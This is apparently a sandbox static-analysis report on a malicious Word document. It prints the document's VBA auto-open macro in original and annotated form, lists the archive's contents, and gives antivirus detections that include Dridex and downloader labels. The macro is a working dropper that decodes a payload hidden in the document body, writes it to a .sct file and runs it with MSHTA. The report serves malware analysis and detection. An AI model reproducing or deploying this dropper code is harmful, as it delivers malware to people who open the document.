Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst annotation (sample code left unmodified).
' Document_Open in the ThisDocument module is the handler Word runs when the
' document is opened with macros enabled. In the visible code it does two things:
'   1. decodes a long, delimiter-separated run of numbers stored in the document
'      body and writes the result to a .sct file under %ALLUSERSPROFILE%;
'   2. launches that file through a WScript.Shell Exec call.
' The decoded file content itself is not shown on this page.
Sub Document_Open()

        ' Accumulator for the decoded payload text.
        ChOMhhQWXN = ""
        
        ' A FileSystemObject is created but never referenced again in this Sub.
        Set VuMoqPDUWBbF = CreateObject("Scripting.FileSystemObject")
        ' Drop path: fixed, randomly named .sct file in the all-users profile directory.
        wkyKWSIdtBQkZUwSvZl = Environ("ALLUSERSPROFILE") & "\bRNuYmzFVtUBAreUdKS.sct"
        
        ' The file is opened for output before any paragraph is inspected, so it is
        ' created (or truncated) even when no paragraph passes the length test below.
        Open wkyKWSIdtBQkZUwSvZl For Output As #1
        For Each rrqtYdDjYG In ActiveDocument.Paragraphs
            ibOmQJdmayTAeNMZ = rrqtYdDjYG.Range.Text
            ' Only a paragraph longer than 10000 characters is treated as the payload carrier.
            If Len(ibOmQJdmayTAeNMZ) > 10000 Then
                ' The carrier text is a list of numbers separated by the marker "tJOWBksDjhoM".
                miMXoCBHAp = Split(ibOmQJdmayTAeNMZ, "tJOWBksDjhoM")
                For Each CwxFKPLNHbS In miMXoCBHAp
                    ' Each number is a character code; CInt already yields an integer,
                    ' so Round adds nothing beyond obscuring the expression.
                    ChOMhhQWXN = ChOMhhQWXN + Chr(Round(CInt(CwxFKPLNHbS)))
                Next CwxFKPLNHbS
            
            ' Write the decoded text to the drop file.
            Print #1, ChOMhhQWXN
            
            ' Stop after the first qualifying paragraph.
            Exit For
            End If
           
        Next rrqtYdDjYG
        
        Close #1


        RjtuDCcnZCy = ""


        ' The character codes 77, 83, 72, 84, 65, 32 decode to "MSHTA " (with trailing space),
        ' keeping the interpreter name out of the macro's plain strings.
        For Each mVhgYBZmTW In Array(77, 83, 72, 84, 65, 32)
            RjtuDCcnZCy = RjtuDCcnZCy + Chr(Round(CInt(mVhgYBZmTW)))
        Next mVhgYBZmTW
        ' Resulting command line: "MSHTA " followed by the drop path.
        EiFKNFOVqF = RjtuDCcnZCy & wkyKWSIdtBQkZUwSvZl
        ' Detection note: this step starts mshta as a child of the Office process, with
        ' a freshly written .sct file under %ALLUSERSPROFILE% as its argument. Both the
        ' parent/child relationship and the file write are observable in process and
        ' file telemetry.
        With CreateObject("Wscript.Shell")
            .Exec (EiFKNFOVqF)
        End With
        
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst annotation (sample code left unmodified).
' This listing carries the same randomized identifiers as the listing under
' "Original". Reading aid for the names used in this Sub:
'   ChOMhhQWXN          decoded payload text
'   VuMoqPDUWBbF        FileSystemObject instance (created, not used in this Sub)
'   wkyKWSIdtBQkZUwSvZl drop path: %ALLUSERSPROFILE%\bRNuYmzFVtUBAreUdKS.sct
'   rrqtYdDjYG          current document paragraph
'   ibOmQJdmayTAeNMZ    text of the current paragraph
'   miMXoCBHAp          number strings obtained by splitting on "tJOWBksDjhoM"
'   CwxFKPLNHbS         one number string (a character code)
'   RjtuDCcnZCy         decoded launcher prefix, "MSHTA "
'   mVhgYBZmTW          one character code of the launcher prefix
'   EiFKNFOVqF          full command line passed to Exec
Sub Document_Open()

        ChOMhhQWXN = ""
        
        Set VuMoqPDUWBbF = CreateObject("Scripting.FileSystemObject")
        wkyKWSIdtBQkZUwSvZl = Environ("ALLUSERSPROFILE") & "\bRNuYmzFVtUBAreUdKS.sct"
        
        ' Stage 1: carve the payload out of the document body and write it to disk.
        ' The output file is opened before the search, so it exists afterwards even
        ' if no paragraph qualifies.
        Open wkyKWSIdtBQkZUwSvZl For Output As #1
        For Each rrqtYdDjYG In ActiveDocument.Paragraphs
            ibOmQJdmayTAeNMZ = rrqtYdDjYG.Range.Text
            ' Carrier selection: the first paragraph with more than 10000 characters.
            If Len(ibOmQJdmayTAeNMZ) > 10000 Then
                miMXoCBHAp = Split(ibOmQJdmayTAeNMZ, "tJOWBksDjhoM")
                For Each CwxFKPLNHbS In miMXoCBHAp
                    ' number string -> integer -> character, appended to the payload text
                    ChOMhhQWXN = ChOMhhQWXN + Chr(Round(CInt(CwxFKPLNHbS)))
                Next CwxFKPLNHbS
            
            Print #1, ChOMhhQWXN
            
            Exit For
            End If
           
        Next rrqtYdDjYG
        
        Close #1


        ' Stage 2: build the launcher command and run it.
        RjtuDCcnZCy = ""


        ' 77 83 72 84 65 32 -> "M" "S" "H" "T" "A" " "
        For Each mVhgYBZmTW In Array(77, 83, 72, 84, 65, 32)
            RjtuDCcnZCy = RjtuDCcnZCy + Chr(Round(CInt(mVhgYBZmTW)))
        Next mVhgYBZmTW
        EiFKNFOVqF = RjtuDCcnZCy & wkyKWSIdtBQkZUwSvZl
        ' Executes "MSHTA <drop path>" through WScript.Shell. What the dropped .sct
        ' does is not visible on this page; recover it from the document body or
        ' from the dropped file before drawing conclusions about later stages.
        With CreateObject("Wscript.Shell")
            .Exec (EiFKNFOVqF)
        End With
        
End Sub

                                    
[Content_Types].xml
_rels/.rels
A$>"f3
word/_rels/document.xml.rels
-|d[0a
V~j08b
word/document.xml
DjQ/*E
miq 8!
xyrvxy
~8?}p%
ki'*m
+Q?mde
oN<KH}
3t3;X^
olYk}8
SmHo1#4
!- lpru,%i#
"Y'[NVC
=k[m75
word/vbaProject.bin
V^-3As
mn7d.a{
BaM+ff
pb,zpjKd&F
8$SNd'
'$+~Iz
word/_rels/vbaProject.bin.relsl
1tiJGI
word/theme/theme1.xml
w toc'v
3Vq%'#q
:\TZaG
IqbJ#x
T[XF64
word/vbaData.xml
word/settings.xml
fg,uXz
docProps/app.xml
word/styles.xml
sn=xr/a
1*k*eR
AJ==yc
docProps/core.xml
word/fontTable.xml
word/webSettings.xml
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan VBA.Heur2.Dridex.2.B976E273.Gen
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
Trustlook Clean
BitDefender VBA.Heur2.Dridex.2.B976E273.Gen
K7GW Clean
K7AntiVirus Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
Tencent Clean
Ad-Aware VBA.Heur2.Dridex.2.B976E273.Gen
TACHYON Suspicious/WOX.Obfus.Gen.8
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.lc
FireEye VBA.Heur2.Dridex.2.B976E273.Gen
Emsisoft VBA.Heur2.Dridex.2.B976E273.Gen (B)
SentinelOne Static AI - Malicious OPENXML
GData VBA.Heur2.Dridex.2.B976E273.Gen
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Avast-Mobile Clean
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=83)
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
Panda Clean
Qihoo-360 virus.office.qexvmc.1070
No IRMA results available.